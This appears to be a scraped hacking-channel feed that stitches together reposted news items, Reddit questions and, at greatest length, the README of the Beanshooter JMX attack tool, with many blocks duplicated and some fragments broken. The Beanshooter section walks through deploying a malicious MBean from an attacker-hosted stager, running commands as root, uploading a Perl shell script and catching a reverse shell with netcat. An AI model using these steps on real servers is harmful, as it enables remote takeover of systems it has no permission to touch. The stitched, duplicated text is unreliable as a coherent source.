Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Banking system hacking scam
Fifteen banks including Nepal Rastra Bank have received warning of hacking their banking system.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Banking system hacking scam
Fifteen banks including Nepal Rastra Bank have received warning of hacking their banking system.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Banking system hacking scam
Fifteen banks including Nepal Rastra Bank have received warning of hacking their banking system.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Metasploit Framework
https://cdn-images-1.medium.com/max/780/0*sGEuUu1FkE3NmVHo
visit metasploit.com
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Metasploit Framework
https://cdn-images-1.medium.com/max/780/0*sGEuUu1FkE3NmVHo
visit metasploit.com
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Metasploit Framework
visit metasploit.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Exploiting MS 17–010 (Blue) in Windows
https://cdn-images-1.medium.com/max/1400/0*gqSD54TyZ7iIHYne
Deploy the machine from this link: TryHackME blue And if you have not signed up yet, what are you waiting for! Sign up Already! TryHackMe
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Exploiting MS 17–010 (Blue) in Windows
https://cdn-images-1.medium.com/max/1400/0*gqSD54TyZ7iIHYne
Deploy the machine from this link: TryHackME blue And if you have not signed up yet, what are you waiting for! Sign up Already! TryHackMe
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Exploiting MS 17–010 (Blue) in Windows
Deploy the machine from this link: TryHackME blue And if you have not signed up yet, what are you waiting for! Sign up Already! TryHackMe
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
MacOS Being Picked Apart by $49 XLoader Data Stealer
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg MacOS Being Picked Apart by $49 XLoader Data StealerPost Views: 85
Reading Time: 1 Minute
Cheap, easy and prolific, the new version of the old FormBook form-stealer and keylogger has added Mac users to its hit list, and it’s selling like hotcakes.
There’s a new version of the old FormBook form-stealer and keylogger that’s added Mac users to its hit list, and it’s selling like hotcakes on underground markets for as low as $49.
It’s not only cheap; it’s easy. The data stealer is distributed in the form of malware-as-a-service (MaaS) and stands out from competing malware by being drop-dead simple to use, outfitting even code dummies with a multipurpose malware tool.
In a report posted on Wednesday, analysts at Check Point Research (CPR) said that the new strain of FormBook – which mainly targeted Windows users when it first popped up on hacking forums in 2016 – is named XLoader. According to the report, FormBook disappeared from malware markets in 2018, then rebranded to XLoader in 2020.
Over the past six months, XLoader’s been a busy beaver, prolifically targeting Window users but also gnawing on its newfound love: namely, “to CPR’s surprise,” Mac users.
XLoader licenses start at $49: a price that will get even the most inexperienced and poorly funded cyberattackers a tool that they can use to harvest log-in credentials, collect screenshots, log keystrokes and execute malicious files.
Check Point has tracked XLoader requests flooding in from eager attackers in 69 countries. Most of the targets – 53 percent – are in the U.S., including both Mac and Windows users.
See Also: Microsoft: New Unpatched Bug in Windows Print Spooler
The breakdown of victims by country is presented in the bar graph below: https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/20191027/CPR-Formbook-victims-figure-1.png Victims are tricked into downloading XLoader via spoofed emails that contain malicious Microsoft Office documents. From Humble Keylogger to Red-Hot MalwareAs of December, as Check Point reported at the time, FormBook was the third most prevalent malware family. It was outpaced only by Emotet at No. 1 (the servers for which were globally dismantled in January) and the TrickBot banking trojan/ransomware malware, which ranked No. 2. AnyRun Malware Trends Tracker backs that up: As of Tuesday evening, FormBook was ranked third most-spotted sample out of millions in the preceding week, and it was climbing in popularity. Between June 2020 and June 2021, AnyRun ranked FormBook as the fourth most prevalent malware family.
This isn’t what the malware author had in mind. At first, it was just supposed to be a keylogger – a cheap one, at that. At least back in 2016, attackers could rent FormBook MaaS for as little as $29/week. https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/20191250/Initial-FormBook-pricing-e1626822824816.jpg Initial FormBook pricing. Source: Check Point.
But customers quickly spotted its potential to be used in broad spam campaigns for use across the world, researchers explained. As the potential became reality, the author – “ng-Coder,” whom Check Point researchers decided is a “he” – stopped selling FormBook. The author hadn’t wanted the tool to be used in email campaigns and had, in fact, banned customers from using it for spam. Ng-Coder made a final post in May 2018, and then the malware maker’s FormBook activity stopped. See Also: Offensive Security Tool: Veil
Or, at least, his activity went dark. Researchers theorize that ng-Coder might have had his own plans [...]
___________________________
@hacking_Attack
@Hacking_Video
MacOS Being Picked Apart by $49 XLoader Data Stealer
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg MacOS Being Picked Apart by $49 XLoader Data StealerPost Views: 85
Reading Time: 1 Minute
Cheap, easy and prolific, the new version of the old FormBook form-stealer and keylogger has added Mac users to its hit list, and it’s selling like hotcakes.
There’s a new version of the old FormBook form-stealer and keylogger that’s added Mac users to its hit list, and it’s selling like hotcakes on underground markets for as low as $49.
It’s not only cheap; it’s easy. The data stealer is distributed in the form of malware-as-a-service (MaaS) and stands out from competing malware by being drop-dead simple to use, outfitting even code dummies with a multipurpose malware tool.
In a report posted on Wednesday, analysts at Check Point Research (CPR) said that the new strain of FormBook – which mainly targeted Windows users when it first popped up on hacking forums in 2016 – is named XLoader. According to the report, FormBook disappeared from malware markets in 2018, then rebranded to XLoader in 2020.
Over the past six months, XLoader’s been a busy beaver, prolifically targeting Window users but also gnawing on its newfound love: namely, “to CPR’s surprise,” Mac users.
XLoader licenses start at $49: a price that will get even the most inexperienced and poorly funded cyberattackers a tool that they can use to harvest log-in credentials, collect screenshots, log keystrokes and execute malicious files.
Check Point has tracked XLoader requests flooding in from eager attackers in 69 countries. Most of the targets – 53 percent – are in the U.S., including both Mac and Windows users.
See Also: Microsoft: New Unpatched Bug in Windows Print Spooler
The breakdown of victims by country is presented in the bar graph below: https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/20191027/CPR-Formbook-victims-figure-1.png Victims are tricked into downloading XLoader via spoofed emails that contain malicious Microsoft Office documents. From Humble Keylogger to Red-Hot MalwareAs of December, as Check Point reported at the time, FormBook was the third most prevalent malware family. It was outpaced only by Emotet at No. 1 (the servers for which were globally dismantled in January) and the TrickBot banking trojan/ransomware malware, which ranked No. 2. AnyRun Malware Trends Tracker backs that up: As of Tuesday evening, FormBook was ranked third most-spotted sample out of millions in the preceding week, and it was climbing in popularity. Between June 2020 and June 2021, AnyRun ranked FormBook as the fourth most prevalent malware family.
This isn’t what the malware author had in mind. At first, it was just supposed to be a keylogger – a cheap one, at that. At least back in 2016, attackers could rent FormBook MaaS for as little as $29/week. https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/20191250/Initial-FormBook-pricing-e1626822824816.jpg Initial FormBook pricing. Source: Check Point.
But customers quickly spotted its potential to be used in broad spam campaigns for use across the world, researchers explained. As the potential became reality, the author – “ng-Coder,” whom Check Point researchers decided is a “he” – stopped selling FormBook. The author hadn’t wanted the tool to be used in email campaigns and had, in fact, banned customers from using it for spam. Ng-Coder made a final post in May 2018, and then the malware maker’s FormBook activity stopped. See Also: Offensive Security Tool: Veil
Or, at least, his activity went dark. Researchers theorize that ng-Coder might have had his own plans [...]
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Ethical Hacking
MacOS Being Picked Apart by $49 XLoader Data Stealer
___________________________
@hacking_Attack
@Hacking_Video
MacOS Being Picked Apart by $49 XLoader Data Stealer
___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
How skilled is the Lazarus Group ?
How dangerous is it ? How does it compare to Evil Corp (Maksim Yakubets) or the NSO Group ? Which groups are better than Lazarus Group ?
submitted by /u/PRADYUSH2006
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How skilled is the Lazarus Group ?
How dangerous is it ? How does it compare to Evil Corp (Maksim Yakubets) or the NSO Group ? Which groups are better than Lazarus Group ?
submitted by /u/PRADYUSH2006
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
r/hacking - How skilled is the Lazarus Group ?
0 votes and 0 comments so far on Reddit
hacking: security in practice
Hacking a 2002 PC game
Hello! For the las week I have been trying to play the 2002 game Pink Panther: Pinkadelic Pursuit, with dgvoodoo 2 I managed to fix the graphical issues. The weird thing is that when it’s just installed it can open and be played with music, but once you put compatibility mode the music is gone, and if you disable compatibility mode the game crashes! I tried reinstalling and there’s no way of replicating the thing from fresh installed so I’m stuck there. If you play like that with the disc mounted (.Cue) there’s no music, and from what I have learned the music of the levels are in the .cue, you can open it with windows media player, but there are no files, so I would like to know if there’s someone interested in open this game with me.
I want to know how the game works, how the music is being read, and where is the button mapping (you need to move with the arrows), there’s too low info of this game so it would be great if it can be replayed In the full experience! Also the game is abandonware so I think it’s not ethically bad to do so.
submitted by /u/PapayaMann
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacking a 2002 PC game
Hello! For the las week I have been trying to play the 2002 game Pink Panther: Pinkadelic Pursuit, with dgvoodoo 2 I managed to fix the graphical issues. The weird thing is that when it’s just installed it can open and be played with music, but once you put compatibility mode the music is gone, and if you disable compatibility mode the game crashes! I tried reinstalling and there’s no way of replicating the thing from fresh installed so I’m stuck there. If you play like that with the disc mounted (.Cue) there’s no music, and from what I have learned the music of the levels are in the .cue, you can open it with windows media player, but there are no files, so I would like to know if there’s someone interested in open this game with me.
I want to know how the game works, how the music is being read, and where is the button mapping (you need to move with the arrows), there’s too low info of this game so it would be great if it can be replayed In the full experience! Also the game is abandonware so I think it’s not ethically bad to do so.
submitted by /u/PapayaMann
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hacking a 2002 PC game
Hello! For the las week I have been trying to play the 2002 game Pink Panther: Pinkadelic Pursuit, with dgvoodoo 2 I managed to fix the graphical...
hacking: security in practice
Nmap firewall bypass
Can anyone share any resources or cheatsheets which will help me to bypass firewall and get nmap result back, just like we get in ctfs etc. I have done a ton of tryhackme and have my one methodology to approach a target. But ctfs never taught how to evade firewalls etc so i need help regarding this. Thanks
submitted by /u/Nightkinnng
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Nmap firewall bypass
Can anyone share any resources or cheatsheets which will help me to bypass firewall and get nmap result back, just like we get in ctfs etc. I have done a ton of tryhackme and have my one methodology to approach a target. But ctfs never taught how to evade firewalls etc so i need help regarding this. Thanks
submitted by /u/Nightkinnng
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Nmap firewall bypass
Can anyone share any resources or cheatsheets which will help me to bypass firewall and get nmap result back, just like we get in ctfs etc. I...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Ethical Hacking (part 6.0/20): Malware explained and how to protect against them
https://cdn-images-1.medium.com/max/1920/1*gcN6-Io9iDzWZcVR6lBGGA.jpeg
Note: Treat this article as an up-to-date source of knowledge. I try hard to update it as often as possible, the latest update is as of…
Continue reading on Medium »
Ethical Hacking (part 6.0/20): Malware explained and how to protect against them
https://cdn-images-1.medium.com/max/1920/1*gcN6-Io9iDzWZcVR6lBGGA.jpeg
Note: Treat this article as an up-to-date source of knowledge. I try hard to update it as often as possible, the latest update is as of…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Can cryptocurrencies be hacked?
https://cdn-images-1.medium.com/max/1920/1*867mqBDCqH7loZHS7Zh6jQ.png
Technically, any software can be hacked, but people believe that cyber-attacks on crypto help to discover and eliminate vulnerabilities.
Continue reading on Cryptocurrency Hub »
Can cryptocurrencies be hacked?
https://cdn-images-1.medium.com/max/1920/1*867mqBDCqH7loZHS7Zh6jQ.png
Technically, any software can be hacked, but people believe that cyber-attacks on crypto help to discover and eliminate vulnerabilities.
Continue reading on Cryptocurrency Hub »
Beanshooter - JMX Enumeration And Attacking Tool
http://www.kitploit.com/2021/07/beanshooter-jmx-enumeration-and.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/07/beanshooter-jmx-enumeration-and.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Beanshooter - JMX Enumeration And Attacking Tool
IntroductionJMX stands for Java Management Extensions and can be used to monitor and configure the Java Virtual Machine from remote. Applications like tomcat or JBoss are often installed together with a JMX instance, which enables server administrators to monitor and manage the corresponding application. JMX uses so called MBeans for monitoring and configuration tasks. The JMX agent (sever, port) is basically just an interface, that handles remote connections and supports methods to communicate with the underlying MBean objects. The actual functionality is then implemented in the MBean itself and the JMX agent only relays input and output to the MBean object. By default, JMX endpoints support a MBean with name MLet. This MBean can be used to deploy new MBeans on the JMX agent. The codebase for these new MBean objects can be obtained over the network e.g. in form of a HTTP request. Using the MLet feature, attackers with access to a JMX agent can easily deploy their own malicious MBean objects and compromise the underlying application server. Beanshooter is a Proof-of-Concept tool, that can be used to identify vulnerable endpoints. It works for unauthenticated JMX endpoints as well as for authenticated ones (assumed you have valid credentials and sufficient permissions). Furthermore, it can be used to test other vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) like insecure Java Deserialization or CVE-2016-3427. Also connections using the JMXMP protocol are supported.
Installation
Beanshooter is a Maven project. This makes the installation a straight forward process and no manual installation of libraries should be required. First of all, make sure that you have maven installed on your system: $ sudo apt install maven # Debian
$ pacman -s maven # Arch Then, clone the beanshooter project in a location of your choice and run mvn package inside of the projects folder. ------------------- [INFO] Building beanshooter 2.0.0 [INFO] --------------------------------[ jar ]--------------------------------- [...] ">[qtc@kali opt]$ git clone https://github.com/qtc-de/beanshooter
[qtc@kali opt]$ cd beanshooter
[qtc@kali beanshooter]$ mvn package
[INFO] Scanning for projects...
[INFO]
[INFO] -------------------< de.qtc.Beanshooter:beanshooter >-------------------
[INFO] Building beanshooter 2.0.0
[INFO] --------------------------------[ jar ]---------------------------------
[...] Since the main purpose of beanshooter is the deployment of MBean objects, you need also a corresponding MBean. Theoretically you can deploy any MBean that fulfills the MBean specifications. However, this project does also provide a reference implementation, the tonka-bean (https://github.com/qtc-de/beanshooter/blob/master/tonka-bean). The tonka-bean is a separate maven project and you can compile it in the same way as you compiled beanshooter: --------------------- [INFO] Building tonka-bean 1.0.0 [INFO] --------------------------------[ jar ]--------------------------------- [INFO] [...] ">[qtc@kali beanshooter]$ cd tonka-bean/
[qtc@kali tonka-bean]$ mvn package
[INFO] Scanning for projects...
[INFO]
[INFO] --------------------< de.qtc.TonkaBean:tonka-bean >---------------------
[INFO] Building tonka-bean 1.0.0
[INFO] --------------------------------[ jar ]---------------------------------
[INFO]
[...] After maven has finished, you should find the executable .jar files in the target folders of the corresponding projects. Notice, that beanshooter needs to know where the tonka-bean.jar file is located. If you have placed beanshooter inside of your /opt folder, this should work automatically. Otherwise, you need to specify the path by using a configuration file or the corresponding command line options. [qtc@kali opt]$ ls -l beanshooter/target/beanshooter.jar
-rw-r--r-- 1 qtc qtc 314856 Sep 16 07:55 beanshooter/target/beanshooter.jar
___________________________
@hacking_Attack
@Hacking_Video
Installation
Beanshooter is a Maven project. This makes the installation a straight forward process and no manual installation of libraries should be required. First of all, make sure that you have maven installed on your system: $ sudo apt install maven # Debian
$ pacman -s maven # Arch Then, clone the beanshooter project in a location of your choice and run mvn package inside of the projects folder. ------------------- [INFO] Building beanshooter 2.0.0 [INFO] --------------------------------[ jar ]--------------------------------- [...] ">[qtc@kali opt]$ git clone https://github.com/qtc-de/beanshooter
[qtc@kali opt]$ cd beanshooter
[qtc@kali beanshooter]$ mvn package
[INFO] Scanning for projects...
[INFO]
[INFO] -------------------< de.qtc.Beanshooter:beanshooter >-------------------
[INFO] Building beanshooter 2.0.0
[INFO] --------------------------------[ jar ]---------------------------------
[...] Since the main purpose of beanshooter is the deployment of MBean objects, you need also a corresponding MBean. Theoretically you can deploy any MBean that fulfills the MBean specifications. However, this project does also provide a reference implementation, the tonka-bean (https://github.com/qtc-de/beanshooter/blob/master/tonka-bean). The tonka-bean is a separate maven project and you can compile it in the same way as you compiled beanshooter: --------------------- [INFO] Building tonka-bean 1.0.0 [INFO] --------------------------------[ jar ]--------------------------------- [INFO] [...] ">[qtc@kali beanshooter]$ cd tonka-bean/
[qtc@kali tonka-bean]$ mvn package
[INFO] Scanning for projects...
[INFO]
[INFO] --------------------< de.qtc.TonkaBean:tonka-bean >---------------------
[INFO] Building tonka-bean 1.0.0
[INFO] --------------------------------[ jar ]---------------------------------
[INFO]
[...] After maven has finished, you should find the executable .jar files in the target folders of the corresponding projects. Notice, that beanshooter needs to know where the tonka-bean.jar file is located. If you have placed beanshooter inside of your /opt folder, this should work automatically. Otherwise, you need to specify the path by using a configuration file or the corresponding command line options. [qtc@kali opt]$ ls -l beanshooter/target/beanshooter.jar
-rw-r--r-- 1 qtc qtc 314856 Sep 16 07:55 beanshooter/target/beanshooter.jar
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 06:51 CEST
Nmap scan report for 172.17.0.2
Host is up (0.0000050s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
5555/tcp open java-object JMXMP Connectors
5556/tcp open java-object Java Object Serialization
5557/tcp open java-object Java Object Serialization
5558/tcp open java-object Java Object Serialization
5559/tcp open java-object Java Object Serialization
5560/tcp open java-object Java Object Serialization
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
9010/tcp open ssl/sdr?
9011/tcp open ssl/d-star?
40213/tcp open java-rmi Java RMI
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.50 se conds This output can be misleading, as nmap is not able to detect the rmiregistry right away. This is because the rmiregistry on this server is configured for TLS usage, which breaks most of the common detection and enumeration tools. However, by looking at the high port that was successfully flagged as Java RMI, once can guess that one of the SSL ports has to be the rmiregistry. Using remote-method-guesser (https://github.com/qtc-de/remote-method-guesser) (one of the few tools that support SSL protected registry servers), one can verify that a JMX agent is running: javax.management.remote.rmi.RMIServerImpl_Stub (known class) ">[qtc@kali ~]$ rmg --ssl --classes 172.17.0.2 9010
[+] Connecting to RMI registry... done.
[+] Obtaining a list of bound names... done.
[+] 1 names are bound to the registry.
[-] RMI object tries to connect to different remote host: iinsecure.dev
[-] Redirecting the ssl connection back to 172.17.0.2...
[-] This is done for all further requests. This message is not shown again.
[+] Listing bound names in registry:
[+] • jmxrmi
[+] --> javax.management.remote.rmi.RMIServerImpl_Stub (known class) To verify unauthenticated access, you can use beanshooter with the status action. On an unprotected JMX endpoint, the output should look like this: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Getting Status of MLet... done!
[+] MLet is not registered on the JMX server.
[+] Getting Status of malicious Bean... done!
[+] malicious Bean is not registered on the JMX server. The status command shows that neither MLet nor the malicious MBean are registered on the JMX endpoint. You could now either deploy them one by one by using the deployMLet and deployMBean actions, or you can simply use deployAll to deploy both in one step. However, for deploying the malicious MBean the remote server needs to establish a HTTP connection to your listener. Therefore, you might need a firewall whitelisting (https://www.kitploit.com/search/label/Whitelisting) and you have to use the corresponding --stager-host and --stager-port options of beanshooter to specify where your listener can be found. Lastly, make sure that the MBean you want to deploy can be found in the path that is specified in your configuration file (default is: /opt/beanshooter/tonka-bean/target/). If you use a custom MBean, you should also adopt the beanClass and objectName values. [qtc@kali ~]$ beanshooter --ssl --stager-host 172.17.0.1 --stager-port 8080 172.17.0.2 9010 deployAll
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Creating MBean 'MLet' for remote deploymet... done!
[+]
[+] Malicious Bean seems not to be registered on the server
[+] Starting registration process
___________________________
@hacking_Attack
@Hacking_Video
Nmap scan report for 172.17.0.2
Host is up (0.0000050s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
5555/tcp open java-object JMXMP Connectors
5556/tcp open java-object Java Object Serialization
5557/tcp open java-object Java Object Serialization
5558/tcp open java-object Java Object Serialization
5559/tcp open java-object Java Object Serialization
5560/tcp open java-object Java Object Serialization
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
9010/tcp open ssl/sdr?
9011/tcp open ssl/d-star?
40213/tcp open java-rmi Java RMI
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.50 se conds This output can be misleading, as nmap is not able to detect the rmiregistry right away. This is because the rmiregistry on this server is configured for TLS usage, which breaks most of the common detection and enumeration tools. However, by looking at the high port that was successfully flagged as Java RMI, once can guess that one of the SSL ports has to be the rmiregistry. Using remote-method-guesser (https://github.com/qtc-de/remote-method-guesser) (one of the few tools that support SSL protected registry servers), one can verify that a JMX agent is running: javax.management.remote.rmi.RMIServerImpl_Stub (known class) ">[qtc@kali ~]$ rmg --ssl --classes 172.17.0.2 9010
[+] Connecting to RMI registry... done.
[+] Obtaining a list of bound names... done.
[+] 1 names are bound to the registry.
[-] RMI object tries to connect to different remote host: iinsecure.dev
[-] Redirecting the ssl connection back to 172.17.0.2...
[-] This is done for all further requests. This message is not shown again.
[+] Listing bound names in registry:
[+] • jmxrmi
[+] --> javax.management.remote.rmi.RMIServerImpl_Stub (known class) To verify unauthenticated access, you can use beanshooter with the status action. On an unprotected JMX endpoint, the output should look like this: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Getting Status of MLet... done!
[+] MLet is not registered on the JMX server.
[+] Getting Status of malicious Bean... done!
[+] malicious Bean is not registered on the JMX server. The status command shows that neither MLet nor the malicious MBean are registered on the JMX endpoint. You could now either deploy them one by one by using the deployMLet and deployMBean actions, or you can simply use deployAll to deploy both in one step. However, for deploying the malicious MBean the remote server needs to establish a HTTP connection to your listener. Therefore, you might need a firewall whitelisting (https://www.kitploit.com/search/label/Whitelisting) and you have to use the corresponding --stager-host and --stager-port options of beanshooter to specify where your listener can be found. Lastly, make sure that the MBean you want to deploy can be found in the path that is specified in your configuration file (default is: /opt/beanshooter/tonka-bean/target/). If you use a custom MBean, you should also adopt the beanClass and objectName values. [qtc@kali ~]$ beanshooter --ssl --stager-host 172.17.0.1 --stager-port 8080 172.17.0.2 9010 deployAll
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Creating MBean 'MLet' for remote deploymet... done!
[+]
[+] Malicious Bean seems not to be registered on the server
[+] Starting registration process
___________________________
@hacking_Attack
@Hacking_Video
nmap.org
Nmap: the Network Mapper - Free Security Scanner
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
[+] Creating HTTP server on 172.17.0.1:8080
[+] Creating MLetHandler for endpoint /mlet... done!
[+] Creating JarHandler for endpoint /tonka-bean.jar... done!
[+] Starting the HTTP server... done!
[+]
[+] Received request for /mlet
[+] Sending malicious mlet:
[+]
[+] Class: de.qtc.tonkabean.TonkaBean
[+] Archive: tonka-bean.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8 080
[+]
[+] Received request for /tonka-bean.jar
[+] Sending malicious jar file... done!
[+]
[+] malicious Bean was successfully registered Now one can use the status or ping command to verify that the malicious MBean was successfully deployed: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Getting Status of MLet... done!
[+] MLet is registered on the JMX server.
[+] Getting Status of malicious Bean... done!
[+] malicious Bean is registered on the JMX server.
[qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 ping
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Sending ping to the server... done!
[+] Servers answer is: Pong! If you deployed a custom malicious MBean, you can now invoke your MBean methods directly from within jconsole. While this is also possible for the tonka-bean, beanshooter supports actions to interact with the tonka-bean from the command line: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 execute id
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Sending command 'id' to the server...
[+] Servers answer is: uid=0(root) gid=0(root) groups=0(root) You can also use the shell action, to launch multiple commands as in a (pseudo) command shell. The shell also contains wrappers around the upload, download and executeBackground actions of beanshooter: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 shell
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Starting interactive shell...
$ id
uid=0(root) gid=0(root) groups=0(root)
$ !upload ~/www/shell.pl /dev/shm/s.pl
[+] File upload finished. 170 bytes were written to /dev/shm/s.pl
$ !background perl /dev/shm/s.pl
Command is executed in the background.
$ exit
[qtc@kali ~]$ nc -vlp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:37522.
id
uid=0(root) gid=0(root) groups=0(root) Once you are done with your MBean, you should make sure to undeploy all changes that you have made to the server. At least you should remove your malicious MBean from the server, but if MLet was not available when you started, you should also remove the MLet. beanshooter makes the cleanup pretty easy, by just invoking: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 undeployAll
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Unregister malicious bean... done!
[+] Unregister MBean 'MLet'... done! Now the JMX endpoint should be clean again and MLet and the malicious MBean should be removed.
JMXMP Support
___________________________
@hacking_Attack
@Hacking_Video
[+] Creating MLetHandler for endpoint /mlet... done!
[+] Creating JarHandler for endpoint /tonka-bean.jar... done!
[+] Starting the HTTP server... done!
[+]
[+] Received request for /mlet
[+] Sending malicious mlet:
[+]
[+] Class: de.qtc.tonkabean.TonkaBean
[+] Archive: tonka-bean.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8 080
[+]
[+] Received request for /tonka-bean.jar
[+] Sending malicious jar file... done!
[+]
[+] malicious Bean was successfully registered Now one can use the status or ping command to verify that the malicious MBean was successfully deployed: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Getting Status of MLet... done!
[+] MLet is registered on the JMX server.
[+] Getting Status of malicious Bean... done!
[+] malicious Bean is registered on the JMX server.
[qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 ping
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Sending ping to the server... done!
[+] Servers answer is: Pong! If you deployed a custom malicious MBean, you can now invoke your MBean methods directly from within jconsole. While this is also possible for the tonka-bean, beanshooter supports actions to interact with the tonka-bean from the command line: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 execute id
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Sending command 'id' to the server...
[+] Servers answer is: uid=0(root) gid=0(root) groups=0(root) You can also use the shell action, to launch multiple commands as in a (pseudo) command shell. The shell also contains wrappers around the upload, download and executeBackground actions of beanshooter: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 shell
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Starting interactive shell...
$ id
uid=0(root) gid=0(root) groups=0(root)
$ !upload ~/www/shell.pl /dev/shm/s.pl
[+] File upload finished. 170 bytes were written to /dev/shm/s.pl
$ !background perl /dev/shm/s.pl
Command is executed in the background.
$ exit
[qtc@kali ~]$ nc -vlp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:37522.
id
uid=0(root) gid=0(root) groups=0(root) Once you are done with your MBean, you should make sure to undeploy all changes that you have made to the server. At least you should remove your malicious MBean from the server, but if MLet was not available when you started, you should also remove the MLet. beanshooter makes the cleanup pretty easy, by just invoking: [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 undeployAll
[+] Connecting to JMX server...
[+] RMI object tries to connect to different remote host: iinsecure.dev
